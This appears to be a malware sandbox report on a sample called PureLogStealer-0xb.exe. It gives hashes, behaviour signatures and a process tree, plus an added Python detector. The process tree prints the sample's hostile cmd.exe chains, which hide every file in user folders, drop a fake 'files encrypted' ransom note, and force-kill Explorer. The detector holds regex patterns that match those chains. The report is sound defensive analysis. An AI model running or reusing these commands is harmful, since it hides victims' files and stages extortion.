Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04/04/2025, 01:30

General

  • Target

    PureLogStealer-0xb.exe

  • Size

    193KB

  • MD5

    98609581725d9cf7f5200dbb02266cd6

  • SHA1

    5f8a127fb69172947c6212b3a466279794b702a4

  • SHA256

    01b57b7ab116a353b5d7d778b62c1a99f7f9f10e6af3a524aa13b9e3a588d751

  • SHA512

    1cfa89386dd206ba5be5a981f4942deb76b71f7dcc5a09f9cf605e87a0128983bce1a8d22300e08e0751321a47c6252575d93fa9d81e847944b2c9fc5aaa2d0d

  • SSDEEP

    6144:pS4OgfnRtcCUsnzUCpM69/KImQi/6ebl:srg/jcy

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
    "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2444
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5952
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5928
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:1916
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2092
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2772
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:4952
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2340
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5128
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5112
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2796
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5684
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" -startup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe -startup
      2⤵
      PID:2380
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3564
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      2⤵
      PID:4768
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --init
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2464
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --init
      2⤵
      PID:4536
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" /setup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe /setup
      2⤵
      PID:4772
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --wininit
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5828
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --wininit
      2⤵
      PID:4800
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c AWindowsService.exe
    1⤵
    PID:5932
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskhost.exe
    1⤵
    PID:1752
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c System.exe
    1⤵
    PID:2776
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c windowsx-c.exe
    1⤵
    PID:3788
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c _default64.exe
    1⤵
    PID:4696
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c native.exe
    1⤵
    PID:4416
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c crypt0rsx.exe
    1⤵
    PID:4420
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ux-cryptor.exe
    1⤵
    PID:4428
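Every level-2 cmd.exe chain in the tree above does the same four things: move into a target (the F: drive, %userprofile%, Desktop, Public Desktop, Downloads, Documents), run `attrib +h +s +r +i /D` with no file spec so that every file in that folder (and, with /D, its subfolders) becomes hidden, system, read-only and non-indexed, write the note with `echo ... 1>info-Locker.txt`, and then re-expose only the note with `attrib -h`. Nothing in the Signatures section reports encryption or file renaming, so the "your files are encrypted" claim in the note is not matched by observed behaviour; the files are hidden, not encrypted. The following detection logic is an added example, not part of the sandbox report or the sample. It runs over constructed process-creation records whose field names (pid, image, command_line) are an assumption modelled on Sysmon Event ID 1; the command lines inside them are the ones the report lists, plus one constructed benign control.

```python
"""Detection logic for the cmd.exe / attrib.exe / taskkill.exe chains in the
Processes tree. Added example; not part of the sandbox report.

Event records are constructed (field names modelled on Sysmon Event ID 1:
pid, image, command_line); the command lines are the ones the report lists.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample events. The last one is a benign control: attrib on a
# single file, no folder hiding, no note dropped.
SAMPLE_EVENTS = [
    {"pid": 4572, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "command_line": r'cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt'},
    {"pid": 4688, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "command_line": r'cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt'},
    {"pid": 2384, "image": r"C:\Windows\SYSTEM32\taskkill.exe",
     "command_line": r"taskkill.exe /im Explorer.exe /f"},
    {"pid": 9001, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r'cmd.exe /c cd "%userprofile%\documents" & attrib -r report.docx'},
]

CMD_PREFIX = re.compile(r'^\s*(?:"[^"]*cmd\.exe"|\S*cmd(?:\.exe)?)\s+/c\s+', re.I)
DRIVE_RE = re.compile(r'^([A-Za-z]:)$')                      # "F:" changes drive
CD_RE = re.compile(r'^cd\s+(?:/d\s+)?"?([^"]+?)"?$', re.I)   # cd "<folder>"
ECHO_RE = re.compile(r'^echo\s+(.*?)\s*\d?>>?\s*(\S+)$', re.I)  # echo <text> 1><file>
ATTRIB_RE = re.compile(r'^attrib(?:\.exe)?\s+(.*)$', re.I)
FLAG_RE = re.compile(r'^[+-][a-z]$', re.I)


@dataclass
class ChainParse:
    target: Optional[str] = None                             # drive or folder the chain moves into
    dir_attrib_flags: Set[str] = field(default_factory=set)  # attrib with no file spec: all files in cwd
    dir_attrib_switches: Set[str] = field(default_factory=set)  # e.g. /D = folders too
    note_file: Optional[str] = None                          # file created by the echo redirect
    note_text: Optional[str] = None
    file_attribs: Dict[str, Set[str]] = field(default_factory=dict)  # per-file flags, name lower-cased


def parse_chain(command_line: str) -> ChainParse:
    """Split a 'cmd /c a & b & c' line into its steps and pull out what matters."""
    p = ChainParse()
    m = CMD_PREFIX.match(command_line)
    body = command_line[m.end():] if m else command_line
    for seg in (s.strip() for s in re.split(r'&+', body)):
        if not seg:
            continue
        if (m := DRIVE_RE.match(seg)) or (m := CD_RE.match(seg)):
            p.target = m.group(1)
        elif (m := ECHO_RE.match(seg)):
            p.note_text, p.note_file = m.group(1), m.group(2)
        elif (m := ATTRIB_RE.match(seg)):
            toks = m.group(1).split()
            flags = {t.lower() for t in toks if FLAG_RE.match(t)}
            switches = {t.upper() for t in toks if t.startswith('/')}
            files = [t for t in toks if not (FLAG_RE.match(t) or t.startswith('/'))]
            if not files:            # no file spec: applies to every file in the cwd
                p.dir_attrib_flags |= flags
                p.dir_attrib_switches |= switches
            for f in files:
                p.file_attribs.setdefault(f.lower(), set()).update(flags)
    return p


def assess(event: dict) -> List[str]:
    """Return the names of the suspicious patterns one event matches (empty if none)."""
    findings: List[str] = []
    image = event["image"].lower()
    cl = event["command_line"]
    if image.endswith("taskkill.exe"):
        if re.search(r'/im\s+explorer\.exe', cl, re.I) and re.search(r'(?:^|\s)/f(?:\s|$)', cl, re.I):
            findings.append("taskkill_explorer_forced")
    elif image.endswith("cmd.exe"):
        p = parse_chain(cl)
        hides_cwd = {"+h", "+s"} <= p.dir_attrib_flags   # hidden+system on everything in the folder
        if hides_cwd:
            findings.append("attrib_hide_cwd")
        if hides_cwd and p.note_file:
            findings.append("ransom_note_staging")        # hide all, then drop a note in the same chain
        if p.note_file and "-h" in p.file_attribs.get(p.note_file.lower(), set()):
            findings.append("note_reexposed")             # only the note is made visible again
    return findings


def triage(events) -> Dict[int, List[str]]:
    """Map pid -> findings for every event that matched at least one pattern."""
    return {e["pid"]: f for e in events if (f := assess(e))}


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The parser is keyed on the shape of the chain rather than on the note text or the Telegram handle, so a rebuild of the sample with a different message still triggers `attrib_hide_cwd` and `ransom_note_staging`; the benign control shows that an ordinary `attrib -r <file>` produces no finding. Recovery on an affected host is the inverse of the chain (clear the hidden and system bits on the folder contents), which is why the parsed `dir_attrib_flags` and `target` are kept rather than just a boolean.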

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PureLogStealer-0xb.exe.log

    Filesize

    1KB

    MD5

    2d2a235f1b0f4b608c5910673735494b

    SHA1

    23a63f6529bfdf917886ab8347092238db0423a0

    SHA256

    c897436c82fda9abf08b29fe05c42f4e59900116bbaf8bfd5b85ef3c97ab7884

    SHA512

    10684245497f1a115142d49b85000075eb36f360b59a0501e2f352c9f1d767c447c6c44c53a3fb3699402a15a8017bdbd2edd72d8599fdd4772e9e7cb67f3086

  • C:\Users\Admin\Downloads\info-Locker.txt

    Filesize

    101B

    MD5

    1a2b4698b0e96ae9366d34402fbdb9b4

    SHA1

    7b7812f974e740b06b00d6aef2c99992ff4ce927

    SHA256

    e0ec26166649bc5126d55bb72939d3e2f12a59b6061c02f8c22085e5628f892c

    SHA512

    4acc058962dfcc85d27581c4b425a721406551ef83468c6186a70f77802bba76a3c52f1d91028b022098abc9ef824474215b9ed408fc47a6d32724218e0fdad1

  • memory/756-0-0x00007FFCA2533000-0x00007FFCA2535000-memory.dmp

    Filesize

    8KB

  • memory/756-1-0x00000000004D0000-0x0000000000506000-memory.dmp

    Filesize

    216KB

  • memory/756-2-0x00007FFCA2530000-0x00007FFCA2FF1000-memory.dmp

    Filesize

    10.8MB

  • memory/756-20-0x00007FFCA2533000-0x00007FFCA2535000-memory.dmp

    Filesize

    8KB

  • memory/756-21-0x00007FFCA2530000-0x00007FFCA2FF1000-memory.dmp

    Filesize

    10.8MB